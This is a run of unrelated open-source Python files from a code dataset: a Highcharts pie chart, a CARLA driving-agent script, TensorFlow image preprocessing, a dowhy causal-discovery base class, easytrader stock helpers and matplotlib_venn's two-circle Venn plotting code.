'color': 'Highcharts.getOptions().colors[0]',
'drilldown': {
'name': 'MSIE versions',
'categories': ['MSIE 6.0', 'MSIE 7.0', 'MSIE 8.0', 'MSIE 9.0'],
'data': [10.85, 7.35, 33.06, 2.81],
'color': 'Highcharts.getOptions().colors[0]'
}
}, {
'y': 21.63,
'color': 'Highcharts.getOptions().colors[1]',
'drilldown': {
'name': 'Firefox versions',
'categories': ['Firefox 2.0', 'Firefox 3.0', 'Firefox 3.5', 'Firefox 3.6', 'Firefox 4.0'],
'data': [0.20, 0.83, 1.58, 13.12, 5.43],
'color': 'Highcharts.getOptions().colors[1]'
}
}, {
'y': 11.94,
'color': 'Highcharts.getOptions().colors[2]',
'drilldown': {
'name': 'Chrome versions',
'categories': ['Chrome 5.0', 'Chrome 6.0', 'Chrome 7.0', 'Chrome 8.0', 'Chrome 9.0',
'Chrome 10.0', 'Chrome 11.0', 'Chrome 12.0'],
'data': [0.12, 0.19, 0.12, 0.36, 0.32, 9.91, 0.50, 0.22],
'color': 'Highcharts.getOptions().colors[2]'
}
}, {
'y': 7.15,
'color': 'Highcharts.getOptions().colors[3]',
'drilldown': {
'name': 'Safari versions',
'categories': ['Safari 5.0', 'Safari 4.0', 'Safari Win 5.0', 'Safari 4.1', 'Safari/Maxthon',
'Safari 3.1', 'Safari 4.1'],
'data': [4.55, 1.42, 0.23, 0.21, 0.20, 0.19, 0.14],
'color': 'Highcharts.getOptions().colors[3]'
}
}, {
'y': 2.14,
'color': 'Highcharts.getOptions().colors[4]',
'drilldown': {
'name': 'Opera versions',
'categories': ['Opera 9.x', 'Opera 10.x', 'Opera 11.x'],
'data': [ 0.12, 0.37, 1.65],
'color': 'Highcharts.getOptions().colors[4]'
}
}]
options = {
'chart': {
'type': 'pie'
},
'title': {
'text': 'Browser market share, April, 2011'
},
'yAxis': {
'title': {
'text': 'Total percent market share'
}
},
'plotOptions': {
'pie': {
'shadow': False,
'center': ['50%', '50%']
}
},
'tooltip': {
'valueSuffix': '%'
},
}
categories = ['MSIE', 'Firefox', 'Chrome', 'Safari', 'Opera']
browserData = []
versionsData = []
for i in range(len(data)):
browserData.append({
'name': categories[i],
'y': data[i]['y'],
'color': data[i]['color']
})
drillDataLen = len(data[i]['drilldown']['data'])
for j in range(drillDataLen):
brightness = 0.2 - (j / drillDataLen) / 5;
versionsData.append({
'name': data[i]['drilldown']['categories'][j],
'y': data[i]['drilldown']['data'][j],
'color': 'Highcharts.Color(' + data[i]['color'] + ').brighten(' + str(brightness) + ').get()'
})
H.set_dict_options(options)
H.add_data_set(browserData, 'pie', 'Browsers', size='60%',
dataLabels={
'formatter': 'function () { \
return this.y > 5 ? this.point.name : null;\
}',
'color': 'white',
'distance': -30
})
H.add_data_set(versionsData, 'pie', 'Versions', size='80%',
innerSize='60%',
dataLabels={
'formatter': "function () {\
return this.y > 1 ? '<b>' + this.point.name + ':</b> ' + this.y + '%' : null;\
}"
})
H.htmlcontent |
Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | 852 | 32053 | <reponame>ckamtsikis/cmssw<filename>Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py
import FWCore.ParameterSet.Config as cms
run2_GEM_2017 = cms.Modifier()
|
d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | 552 | 32054 | # !/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
# Modified by <NAME> on 20 April 2020
import argparse
import datetime
import glob
import os
import random
import sys
import time
from PIL import Image
from PIL.PngImagePlugin import PngInfo
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import math
from dotmap import DotMap
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
try:
import queue
except ImportError:
import Queue as queue
from agents.navigation.agent import Agent, AgentState
from agents.navigation.local_planner import LocalPlanner
from agents.navigation.global_route_planner import GlobalRoutePlanner
from agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle
from agents.navigation.global_route_planner_dao import GlobalRoutePlannerDAO
def is_within_distance(target_location, current_location, orientation, max_distance, d_angle_th_up, d_angle_th_low=0):
"""
Check if a target object is within a certain distance from a reference object.
A vehicle in front would be something around 0 deg, while one behind around 180 deg.
:param target_location: location of the target object
:param current_location: location of the reference object
:param orientation: orientation of the reference object
:param max_distance: maximum allowed distance
:param d_angle_th_up: upper thereshold for angle
:param d_angle_th_low: low thereshold for angle (optional, default is 0)
:return: True if target object is within max_distance ahead of the reference object
"""
target_vector = np.array([target_location.x - current_location.x, target_location.y - current_location.y])
norm_target = np.linalg.norm(target_vector)
# If the vector is too short, we can simply stop here
if norm_target < 0.001:
return True
if norm_target > max_distance:
return False
forward_vector = np.array(
[math.cos(math.radians(orientation)), math.sin(math.radians(orientation))])
d_angle = math.degrees(math.acos(np.clip(np.dot(forward_vector, target_vector) / norm_target, -1., 1.)))
return d_angle_th_low < d_angle < d_angle_th_up
def compute_distance(location_1, location_2):
"""
Euclidean distance between 3D points
:param location_1, location_2: 3D points
"""
x = location_2.x - location_1.x
y = location_2.y - location_1.y
z = location_2.z - location_1.z
norm = np.linalg.norm([x, y, z]) + np.finfo(float).eps
return norm
class CarlaSyncMode(object):
"""
Context manager to synchronize output from different sensors. Synchronous
mode is enabled as long as we are inside this context
with CarlaSyncMode(world, sensors) as sync_mode:
while True:
data = sync_mode.tick(timeout=1.0)
"""
def __init__(self, world, *sensors, **kwargs):
self.world = world
self.sensors = sensors
self.frame = None
self.delta_seconds = 1.0 / kwargs.get('fps', 20)
self._queues = []
self._settings = None
self.start()
def start(self):
self._settings = self.world.get_settings()
self.frame = self.world.apply_settings(carla.WorldSettings(
no_rendering_mode=False,
synchronous_mode=True,
fixed_delta_seconds=self.delta_seconds))
def make_queue(register_event):
q = queue.Queue()
register_event(q.put)
self._queues.append(q)
make_queue(self.world.on_tick)
for sensor in self.sensors:
make_queue(sensor.listen)
def tick(self, timeout):
self.frame = self.world.tick()
data = [self._retrieve_data(q, timeout) for q in self._queues]
assert all(x.frame == self.frame for x in data)
return data
def __exit__(self, *args, **kwargs):
self.world.apply_settings(self._settings)
def _retrieve_data(self, sensor_queue, timeout):
while True:
data = sensor_queue.get(timeout=timeout)
if data.frame == self.frame:
return data
def draw_image(surface, image, blend=False):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
image_surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if blend:
image_surface.set_alpha(100)
surface.blit(image_surface, (0, 0))
def get_font():
fonts = [x for x in pygame.font.get_fonts()]
default_font = 'ubuntumono'
font = default_font if default_font in fonts else fonts[0]
font = pygame.font.match_font(font)
return pygame.font.Font(font, 14)
def should_quit():
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_ESCAPE:
return True
return False
def clamp(value, minimum=0.0, maximum=100.0):
return max(minimum, min(value, maximum))
class Sun(object):
def __init__(self, azimuth, altitude):
self.azimuth = azimuth
self.altitude = altitude
self._t = 0.0
def tick(self, delta_seconds):
self._t += 0.008 * delta_seconds
self._t %= 2.0 * math.pi
self.azimuth += 0.25 * delta_seconds
self.azimuth %= 360.0
min_alt, max_alt = [20, 90]
self.altitude = 0.5 * (max_alt + min_alt) + 0.5 * (max_alt - min_alt) * math.cos(self._t)
def __str__(self):
return 'Sun(alt: %.2f, azm: %.2f)' % (self.altitude, self.azimuth)
class Storm(object):
def __init__(self, precipitation):
self._t = precipitation if precipitation > 0.0 else -50.0
self._increasing = True
self.clouds = 0.0
self.rain = 0.0
self.wetness = 0.0
self.puddles = 0.0
self.wind = 0.0
self.fog = 0.0
def tick(self, delta_seconds):
delta = (1.3 if self._increasing else -1.3) * delta_seconds
self._t = clamp(delta + self._t, -250.0, 100.0)
self.clouds = clamp(self._t + 40.0, 0.0, 90.0)
self.clouds = clamp(self._t + 40.0, 0.0, 60.0)
self.rain = clamp(self._t, 0.0, 80.0)
delay = -10.0 if self._increasing else 90.0
self.puddles = clamp(self._t + delay, 0.0, 85.0)
self.wetness = clamp(self._t * 5, 0.0, 100.0)
self.wind = 5.0 if self.clouds <= 20 else 90 if self.clouds >= 70 else 40
self.fog = clamp(self._t - 10, 0.0, 30.0)
if self._t == -250.0:
self._increasing = True
if self._t == 100.0:
self._increasing = False
def __str__(self):
return 'Storm(clouds=%d%%, rain=%d%%, wind=%d%%)' % (self.clouds, self.rain, self.wind)
class Weather(object):
def __init__(self, world, changing_weather_speed):
self.world = world
self.reset()
self.weather = world.get_weather()
self.changing_weather_speed = changing_weather_speed
self._sun = Sun(self.weather.sun_azimuth_angle, self.weather.sun_altitude_angle)
self._storm = Storm(self.weather.precipitation)
def reset(self):
weather_params = carla.WeatherParameters(sun_altitude_angle=90.)
self.world.set_weather(weather_params)
def tick(self):
self._sun.tick(self.changing_weather_speed)
self._storm.tick(self.changing_weather_speed)
self.weather.cloudiness = self._storm.clouds
self.weather.precipitation = self._storm.rain
self.weather.precipitation_deposits = self._storm.puddles
self.weather.wind_intensity = self._storm.wind
self.weather.fog_density = self._storm.fog
self.weather.wetness = self._storm.wetness
self.weather.sun_azimuth_angle = self._sun.azimuth
self.weather.sun_altitude_angle = self._sun.altitude
self.world.set_weather(self.weather)
def __str__(self):
return '%s %s' % (self._sun, self._storm)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--vision_size', type=int, default=84)
parser.add_argument('--vision_fov', type=int, default=90)
parser.add_argument('--weather', default=False, action='store_true')
parser.add_argument('--frame_skip', type=int, default=1),
parser.add_argument('--steps', type=int, default=100000)
parser.add_argument('--multiagent', default=False, action='store_true'),
parser.add_argument('--lane', type=int, default=0)
parser.add_argument('--lights', default=False, action='store_true')
args = parser.parse_args()
return args
class LocalPlannerModified(LocalPlanner):
def __del__(self):
pass # otherwise it deletes our vehicle object
def run_step(self):
return super().run_step(debug=False) # otherwise by default shows waypoints, that interfere with our camera
class RoamingAgent(Agent):
"""
RoamingAgent implements a basic agent that navigates scenes making random
choices when facing an intersection.
This agent respects traffic lights and other vehicles.
NOTE: need to re-create after each env reset
"""
def __init__(self, env):
"""
:param vehicle: actor to apply to local planner logic onto
"""
vehicle = env.vehicle
follow_traffic_lights = env.follow_traffic_lights
super(RoamingAgent, self).__init__(vehicle)
self._proximity_threshold = 10.0 # meters
self._state = AgentState.NAVIGATING
self._local_planner = LocalPlannerModified(self._vehicle)
self._follow_traffic_lights = follow_traffic_lights
def compute_action(self):
action, traffic_light = self.run_step()
throttle = action.throttle
brake = action.brake
steer = action.steer
#print('tbsl:', throttle, brake, steer, traffic_light)
if brake == 0.0:
return np.array([throttle, steer])
else:
return np.array([-brake, steer])
def run_step(self):
"""
Execute one step of navigation.
:return: carla.VehicleControl
"""
# is there an obstacle in front of us?
hazard_detected = False
# retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
actor_list = self._world.get_actors()
vehicle_list = actor_list.filter("*vehicle*")
lights_list = actor_list.filter("*traffic_light*")
# check possible obstacles
vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
if vehicle_state:
self._state = AgentState.BLOCKED_BY_VEHICLE
hazard_detected = True
# check for the state of the traffic lights
traffic_light_color = self._is_light_red(lights_list)
if traffic_light_color == 'RED' and self._follow_traffic_lights:
self._state = AgentState.BLOCKED_RED_LIGHT
hazard_detected = True
if hazard_detected:
control = self.emergency_stop()
else:
self._state = AgentState.NAVIGATING
# standard local planner behavior
control = self._local_planner.run_step()
#print ('Action chosen: ', control)
return control, traffic_light_color
# override case class
def _is_light_red_europe_style(self, lights_list):
"""
This method is specialized to check European style traffic lights.
Only suitable for Towns 03 -- 07.
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
traffic_light_color = "NONE" # default, if no traffic lights are seen
for traffic_light in lights_list:
object_waypoint = self._map.get_waypoint(traffic_light.get_location())
if object_waypoint.road_id != ego_vehicle_waypoint.road_id or \
object_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
if is_within_distance_ahead(traffic_light.get_transform(),
self._vehicle.get_transform(),
self._proximity_threshold):
if traffic_light.state == carla.TrafficLightState.Red:
return "RED"
elif traffic_light.state == carla.TrafficLightState.Yellow:
traffic_light_color = "YELLOW"
elif traffic_light.state == carla.TrafficLightState.Green:
if traffic_light_color is not "YELLOW": # (more severe)
traffic_light_color = "GREEN"
else:
import pdb; pdb.set_trace()
# investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
return traffic_light_color
# override case class
def _is_light_red_us_style(self, lights_list, debug=False):
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
traffic_light_color = "NONE" # default, if no traffic lights are seen
if ego_vehicle_waypoint.is_junction:
# It is too late. Do not block the intersection! Keep going!
return "JUNCTION"
if self._local_planner.target_waypoint is not None:
if self._local_planner.target_waypoint.is_junction:
min_angle = 180.0
sel_magnitude = 0.0
sel_traffic_light = None
for traffic_light in lights_list:
loc = traffic_light.get_location()
magnitude, angle = compute_magnitude_angle(loc,
ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw)
if magnitude < 60.0 and angle < min(25.0, min_angle):
sel_magnitude = magnitude
sel_traffic_light = traffic_light
min_angle = angle
if sel_traffic_light is not None:
if debug:
print('=== Magnitude = {} | Angle = {} | ID = {}'.format(
sel_magnitude, min_angle, sel_traffic_light.id))
if self._last_traffic_light is None:
self._last_traffic_light = sel_traffic_light
if self._last_traffic_light.state == carla.TrafficLightState.Red:
return "RED"
elif self._last_traffic_light.state == carla.TrafficLightState.Yellow:
traffic_light_color = "YELLOW"
elif self._last_traffic_light.state == carla.TrafficLightState.Green:
if traffic_light_color is not "YELLOW": # (more severe)
traffic_light_color = "GREEN"
else:
import pdb; pdb.set_trace()
# investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
else:
self._last_traffic_light = None
return traffic_light_color
if __name__ == '__main__':
# example call:
# ./PythonAPI/util/config.py --map Town01 --delta-seconds 0.05
# python PythonAPI/carla/agents/navigation/data_collection_agent.py --vision_size 256 --vision_fov 90 --steps 10000 --weather --lights
args = parse_args()
env = CarlaEnv(args)
try:
done = False
while not done:
action, traffic_light_color = env.compute_action()
next_obs, reward, done, info = env.step(action, traffic_light_color)
print ('Reward: ', reward, 'Done: ', done, 'Location: ', env.vehicle.get_location())
if done:
# env.reset_init()
# env.reset()
done = False
finally:
env.finish()
|
applications/tensorflow2/image_classification/data/data_transformer.py | payoto/graphcore_examples | 260 | 32084 | <reponame>payoto/graphcore_examples
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
import tensorflow as tf
from tensorflow.python.ops import math_ops
import logging
from . import imagenet_processing
from custom_exceptions import UnsupportedFormat, DimensionError
class DataTransformer:
logger = logging.getLogger('data_transformer')
@staticmethod
def normalization(ds, scale=1 / 255.0, img_type=tf.float32):
# Applying normalization before `ds.cache()` to re-use it.
# Note: Random transformations (e.g. images augmentations) should be applied
# after both `ds.cache()` (to avoid caching randomness) and `ds.batch()`
# (for vectorization https://www.tensorflow.org/guide/data_performance#vectorizing_mapping).
if not isinstance(ds, tf.data.Dataset):
raise UnsupportedFormat(
f'Type of ds is not the one expected (tf.data.Dataset) {type(ds)}')
if not hasattr(
ds.element_spec, '__len__') or len(ds.element_spec) != 2:
raise DimensionError(
f'Data dimension is not the one supported (2) {ds.element_spec}')
multiplier = tf.cast(scale, img_type)
return ds.map(lambda x,
y: (multiplier * tf.cast(x, img_type), tf.cast(y, tf.int32)),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
@staticmethod
def cache_shuffle(ds: tf.data.Dataset, buffer_size: int = 1, shuffle: bool = True, seed: int = 42):
if not isinstance(ds, tf.data.Dataset):
raise UnsupportedFormat(
f'Type of ds is not the one expected (tf.data.Dataset) {type(ds)}')
ds = ds.cache()
if shuffle:
ds = ds.shuffle(buffer_size, seed=seed)
return ds
@staticmethod
def cifar_preprocess(ds,
buffer_size,
img_type=tf.float32,
is_training=True,
accelerator_side_preprocess=False,
pipeline_num_parallel=48,
seed=42):
if not isinstance(ds, tf.data.Dataset):
raise UnsupportedFormat(
f'Type of ds is not the one expected (tf.data.Dataset) {type(ds)}')
if not hasattr(
ds.element_spec, '__len__') or len(ds.element_spec) != 2:
raise DimensionError(
f'Data dimension is not the one supported (2) {ds.element_spec}')
ds = DataTransformer.cache_shuffle(ds, buffer_size, is_training, seed)
preprocess_fn = cifar_preprocess_training_fn if is_training else cifar_preprocess_inference_fn
if accelerator_side_preprocess:
host_side_preprocess_fn = None
accelerator_side_preprocess_fn = preprocess_fn
else:
host_side_preprocess_fn = preprocess_fn
accelerator_side_preprocess_fn = None
def cifar_preprocess_map_func(x_image):
assert(x_image.shape == (32, 32, 3))
if host_side_preprocess_fn is not None:
x_image = tf.cast(x_image, tf.float32)
x_image = host_side_preprocess_fn(x_image)
x_image = tf.cast(x_image, img_type)
if is_training:
shape = x_image.get_shape().as_list()
padding = 4
x_image = tf.pad(x_image, [[padding, padding], [padding, padding], [0, 0]], "CONSTANT")
x_image = tf.image.random_crop(x_image, shape, seed=seed)
return x_image
ds = ds.map(lambda x, y: (cifar_preprocess_map_func(x), tf.cast(y, tf.int32)),
num_parallel_calls=pipeline_num_parallel)
accelerator_side_preprocess_fn = preprocess_fn if accelerator_side_preprocess is True else None
return ds, accelerator_side_preprocess_fn
@staticmethod
def imagenet_preprocessing(ds,
img_type,
is_training,
accelerator_side_preprocess=True,
pipeline_num_parallel=48,
seed=None):
preprocessing_fn = imagenet_preprocess_training_fn if is_training else imagenet_preprocess_inference_fn
if accelerator_side_preprocess:
host_side_preprocess_fn = None
accelerator_side_preprocess_fn = preprocessing_fn
else:
host_side_preprocess_fn = preprocessing_fn
accelerator_side_preprocess_fn = None
def processing_fn(raw_record): return imagenet_processing.parse_record(
raw_record, is_training, img_type, host_side_preprocess_fn, seed=seed)
return ds.map(processing_fn, num_parallel_calls=pipeline_num_parallel), accelerator_side_preprocess_fn
def _image_normalisation(image, mean, std, scale=255):
mean = tf.cast(mean, dtype=image.dtype)
std = tf.cast(std, dtype=image.dtype)
mean = tf.broadcast_to(mean, tf.shape(image))
std = tf.broadcast_to(std, tf.shape(image))
return (image / scale - mean) / std
def _imagenet_normalize(image):
IMAGENET_NORMALISATION_MEAN = [0.485, 0.456, 0.406]
IMAGENET_NORMALISATION_STD = [0.229, 0.224, 0.225]
return _image_normalisation(image,
IMAGENET_NORMALISATION_MEAN,
IMAGENET_NORMALISATION_STD)
def _cifar_normalize(image):
mean = math_ops.reduce_mean(image, axis=[-1, -2, -3], keepdims=True)
std = math_ops.reduce_std(image, axis=[-1, -2, -3], keepdims=True)
return _image_normalisation(image, mean, std, scale=1)
def imagenet_preprocess_training_fn(image):
return _imagenet_normalize(image)
def imagenet_preprocess_inference_fn(image):
return _imagenet_normalize(image)
def cifar_preprocess_training_fn(image):
image = tf.image.random_flip_left_right(image)
return _cifar_normalize(image)
def cifar_preprocess_inference_fn(image):
return _cifar_normalize(image)
|
dowhy/graph_learner.py | leo-ware/dowhy | 2,904 | 32101 | class GraphLearner:
"""Base class for causal discovery methods.
Subclasses implement different discovery methods. All discovery methods are in the package "dowhy.causal_discoverers"
"""
def __init__(self, data, library_class, *args, **kwargs):
self._data = data
self._labels = list(self._data.columns)
self._adjacency_matrix = None
self._graph_dot = None
def learn_graph(self):
'''
Discover causal graph and the graph in DOT format.
'''
raise NotImplementedError
|
easytrader/utils/stock.py | chforest/easytrader | 6,829 | 32103 | <filename>easytrader/utils/stock.py
# coding:utf-8
import datetime
import json
import random
import requests
def get_stock_type(stock_code):
"""判断股票ID对应的证券市场
匹配规则
['50', '51', '60', '90', '110'] 为 sh
['00', '13', '18', '15', '16', '18', '20', '30', '39', '115'] 为 sz
['5', '6', '9'] 开头的为 sh, 其余为 sz
:param stock_code:股票ID, 若以 'sz', 'sh' 开头直接返回对应类型,否则使用内置规则判断
:return 'sh' or 'sz'"""
stock_code = str(stock_code)
if stock_code.startswith(("sh", "sz")):
return stock_code[:2]
if stock_code.startswith(
("50", "51", "60", "73", "90", "110", "113", "132", "204", "78")
):
return "sh"
if stock_code.startswith(
("00", "13", "18", "15", "16", "18", "20", "30", "39", "115", "1318")
):
return "sz"
if stock_code.startswith(("5", "6", "9")):
return "sh"
return "sz"
def get_30_date():
"""
获得用于查询的默认日期, 今天的日期, 以及30天前的日期
用于查询的日期格式通常为 20160211
:return:
"""
now = datetime.datetime.now()
end_date = now.date()
start_date = end_date - datetime.timedelta(days=30)
return start_date.strftime("%Y%m%d"), end_date.strftime("%Y%m%d")
def get_today_ipo_data():
"""
查询今天可以申购的新股信息
:return: 今日可申购新股列表 apply_code申购代码 price发行价格
"""
agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
send_headers = {
"Host": "xueqiu.com",
"User-Agent": agent,
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "deflate",
"Cache-Control": "no-cache",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://xueqiu.com/hq",
"Connection": "keep-alive",
}
timestamp = random.randint(1000000000000, 9999999999999)
home_page_url = "https://xueqiu.com"
ipo_data_url = (
"https://xueqiu.com/proipo/query.json?column=symbol,name,onl_subcode,onl_subbegdate,actissqty,onl"
"_actissqty,onl_submaxqty,iss_price,onl_lotwiner_stpub_date,onl_lotwinrt,onl_lotwin_amount,stock_"
"income&orderBy=onl_subbegdate&order=desc&stockType=&page=1&size=30&_=%s"
% (str(timestamp))
)
session = requests.session()
session.get(home_page_url, headers=send_headers) # 产生cookies
ipo_response = session.post(ipo_data_url, headers=send_headers)
json_data = json.loads(ipo_response.text)
today_ipo = []
for line in json_data["data"]:
if datetime.datetime.now().strftime("%a %b %d") == line[3][:10]:
today_ipo.append(
{
"stock_code": line[0],
"stock_name": line[1],
"apply_code": line[2],
"price": line[7],
}
)
return today_ipo
|
matplotlib_venn/_venn2.py | TRuikes/matplotlib-venn | 306 | 32134 | <gh_stars>100-1000
'''
Venn diagram plotting routines.
Two-circle venn plotter.
Copyright 2012, <NAME>.
http://kt.era.ee/
Licensed under MIT license.
'''
# Make sure we don't try to do GUI stuff when running tests
import sys, os
if 'py.test' in os.path.basename(sys.argv[0]): # (XXX: Ugly hack)
import matplotlib
matplotlib.use('Agg')
import numpy as np
import warnings
from collections import Counter
from matplotlib.patches import Circle
from matplotlib.colors import ColorConverter
from matplotlib.pyplot import gca
from matplotlib_venn._math import *
from matplotlib_venn._common import *
from matplotlib_venn._region import VennCircleRegion
def compute_venn2_areas(diagram_areas, normalize_to=1.0):
'''
The list of venn areas is given as 3 values, corresponding to venn diagram areas in the following order:
(Ab, aB, AB) (i.e. last element corresponds to the size of intersection A&B&C).
The return value is a list of areas (A, B, AB), such that the total area is normalized
to normalize_to. If total area was 0, returns (1e-06, 1e-06, 0.0)
Assumes all input values are nonnegative (to be more precise, all areas are passed through and abs() function)
>>> compute_venn2_areas((1, 1, 0))
(0.5, 0.5, 0.0)
>>> compute_venn2_areas((0, 0, 0))
(1e-06, 1e-06, 0.0)
>>> compute_venn2_areas((1, 1, 1), normalize_to=3)
(2.0, 2.0, 1.0)
>>> compute_venn2_areas((1, 2, 3), normalize_to=6)
(4.0, 5.0, 3.0)
'''
# Normalize input values to sum to 1
areas = np.array(np.abs(diagram_areas), float)
total_area = np.sum(areas)
if np.abs(total_area) < tol:
warnings.warn("Both circles have zero area")
return (1e-06, 1e-06, 0.0)
else:
areas = areas / total_area * normalize_to
return (areas[0] + areas[2], areas[1] + areas[2], areas[2])
def solve_venn2_circles(venn_areas):
'''
Given the list of "venn areas" (as output from compute_venn2_areas, i.e. [A, B, AB]),
finds the positions and radii of the two circles.
The return value is a tuple (coords, radii), where coords is a 2x2 array of coordinates and
radii is a 2x1 array of circle radii.
Assumes the input values to be nonnegative and not all zero.
In particular, the first two values must be positive.
>>> c, r = solve_venn2_circles((1, 1, 0))
>>> np.round(r, 3).tolist()
[0.564, 0.564]
>>> c, r = solve_venn2_circles(compute_venn2_areas((1, 2, 3)))
>>> np.round(r, 3).tolist()
[0.461, 0.515]
'''
(A_a, A_b, A_ab) = list(map(float, venn_areas))
r_a, r_b = np.sqrt(A_a / np.pi), np.sqrt(A_b / np.pi)
radii = np.array([r_a, r_b])
if A_ab > tol:
# Nonzero intersection
coords = np.zeros((2, 2))
coords[1][0] = find_distance_by_area(radii[0], radii[1], A_ab)
else:
# Zero intersection
coords = np.zeros((2, 2))
coords[1][0] = radii[0] + radii[1] + max(np.mean(radii) * 1.1, 0.2) # The max here is needed for the case r_a = r_b = 0
coords = normalize_by_center_of_mass(coords, radii)
return (coords, radii)
def compute_venn2_regions(centers, radii):
'''
Returns a triple of VennRegion objects, describing the three regions of the diagram, corresponding to sets
(Ab, aB, AB)
>>> centers, radii = solve_venn2_circles((1, 1, 0.5))
>>> regions = compute_venn2_regions(centers, radii)
'''
A = VennCircleRegion(centers[0], radii[0])
B = VennCircleRegion(centers[1], radii[1])
Ab, AB = A.subtract_and_intersect_circle(B.center, B.radius)
aB, _ = B.subtract_and_intersect_circle(A.center, A.radius)
return (Ab, aB, AB)
def compute_venn2_colors(set_colors):
'''
Given two base colors, computes combinations of colors corresponding to all regions of the venn diagram.
returns a list of 3 elements, providing colors for regions (10, 01, 11).
>>> str(compute_venn2_colors(('r', 'g'))).replace(' ', '')
'(array([1.,0.,0.]),array([0.,0.5,0.]),array([0.7,0.35,0.]))'
'''
ccv = ColorConverter()
base_colors = [np.array(ccv.to_rgb(c)) for c in set_colors]
return (base_colors[0], base_colors[1], mix_colors(base_colors[0], base_colors[1]))
def compute_venn2_subsets(a, b):
'''
Given two set or Counter objects, computes the sizes of (a & ~b, b & ~a, a & b).
Returns the result as a tuple.
>>> compute_venn2_subsets(set([1,2,3,4]), set([2,3,4,5,6]))
(1, 2, 3)
>>> compute_venn2_subsets(Counter([1,2,3,4]), Counter([2,3,4,5,6]))
(1, 2, 3)
>>> compute_venn2_subsets(Counter([]), Counter([]))
(0, 0, 0)
>>> compute_venn2_subsets(set([]), set([]))
(0, 0, 0)
>>> compute_venn2_subsets(set([1]), set([]))
(1, 0, 0)
>>> compute_venn2_subsets(set([1]), set([1]))
(0, 0, 1)
>>> compute_venn2_subsets(Counter([1]), Counter([1]))
(0, 0, 1)
>>> compute_venn2_subsets(set([1,2]), set([1]))
(1, 0, 1)
>>> compute_venn2_subsets(Counter([1,1,2,2,2]), Counter([1,2,3,3]))
(3, 2, 2)
>>> compute_venn2_subsets(Counter([1,1,2]), Counter([1,2,2]))
(1, 1, 2)
>>> compute_venn2_subsets(Counter([1,1]), set([]))
Traceback (most recent call last):
...
ValueError: Both arguments must be of the same type
'''
if not (type(a) == type(b)):
raise ValueError("Both arguments must be of the same type")
set_size = len if type(a) != Counter else lambda x: sum(x.values()) # We cannot use len to compute the cardinality of a Counter
return (set_size(a - b), set_size(b - a), set_size(a & b))
def venn2_circles(subsets, normalize_to=1.0, alpha=1.0, color='black', linestyle='solid', linewidth=2.0, ax=None, **kwargs):
'''
Plots only the two circles for the corresponding Venn diagram.
Useful for debugging or enhancing the basic venn diagram.
parameters ``subsets``, ``normalize_to`` and ``ax`` are the same as in venn2()
``kwargs`` are passed as-is to matplotlib.patches.Circle.
returns a list of three Circle patches.
>>> c = venn2_circles((1, 2, 3))
>>> c = venn2_circles({'10': 1, '01': 2, '11': 3}) # Same effect
>>> c = venn2_circles([set([1,2,3,4]), set([2,3,4,5,6])]) # Also same effect
'''
if isinstance(subsets, dict):
subsets = [subsets.get(t, 0) for t in ['10', '01', '11']]
elif len(subsets) == 2:
subsets = compute_venn2_subsets(*subsets)
areas = compute_venn2_areas(subsets, normalize_to)
centers, radii = solve_venn2_circles(areas)
if ax is None:
ax = gca()
prepare_venn_axes(ax, centers, radii)
result = []
for (c, r) in zip(centers, radii):
circle = Circle(c, r, alpha=alpha, edgecolor=color, facecolor='none', linestyle=linestyle, linewidth=linewidth, **kwargs)
ax.add_patch(circle)
result.append(circle)
return result
def venn2(subsets, set_labels=('A', 'B'), set_colors=('r', 'g'), alpha=0.4, normalize_to=1.0, ax=None, subset_label_formatter=None):
'''Plots a 2-set area-weighted Venn diagram.
The subsets parameter can be one of the following:
- A list (or a tuple) containing two set objects.
- A dict, providing sizes of three diagram regions.
The regions are identified via two-letter binary codes ('10', '01', and '11'), hence a valid set could look like:
{'10': 10, '01': 20, '11': 40}. Unmentioned codes are considered to map to 0.
- A list (or a tuple) with three numbers, denoting the sizes of the regions in the following order:
(10, 01, 11)
``set_labels`` parameter is a list of two strings - set labels. Set it to None to disable set labels.
The ``set_colors`` parameter should be a list of two elements, specifying the "base colors" of the two circles.
The color of circle intersection will be computed based on those.
The ``normalize_to`` parameter specifies the total (on-axes) area of the circles to be drawn. Sometimes tuning it (together
with the overall fiture size) may be useful to fit the text labels better.
The return value is a ``VennDiagram`` object, that keeps references to the ``Text`` and ``Patch`` objects used on the plot
and lets you know the centers and radii of the circles, if you need it.
